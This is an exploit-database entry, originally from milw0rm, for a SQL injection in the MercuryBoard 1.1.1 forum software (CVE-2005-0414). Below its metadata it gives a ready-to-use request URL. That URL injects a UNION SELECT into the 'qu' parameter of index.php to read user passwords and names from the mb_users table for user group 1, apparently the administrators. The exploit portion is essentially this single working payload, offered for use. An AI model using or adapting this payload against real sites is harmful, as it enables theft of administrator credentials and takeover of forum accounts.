MercuryBoard 1.1.1 - SQL Injection

Author: Zeelock
type: webapps
platform: php
port: 
date_added: 2005-02-11 
date_updated: 2016-04-28 
verified: 1 
codes: OSVDB-13267;CVE-2005-0414 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.commercuryboard-beta1.tar.gz

# little late posting this /str0ke

Exploit:

http://www.site.com/mercuryboard/index.php?a=post&s=reply&t=1&qu=10000%20UNION%20SELECT%20user_password,user_name%20from%20mb_users%20where%20user_group%20=%201%20limit%201/*

# milw0rm.com [2005-02-12]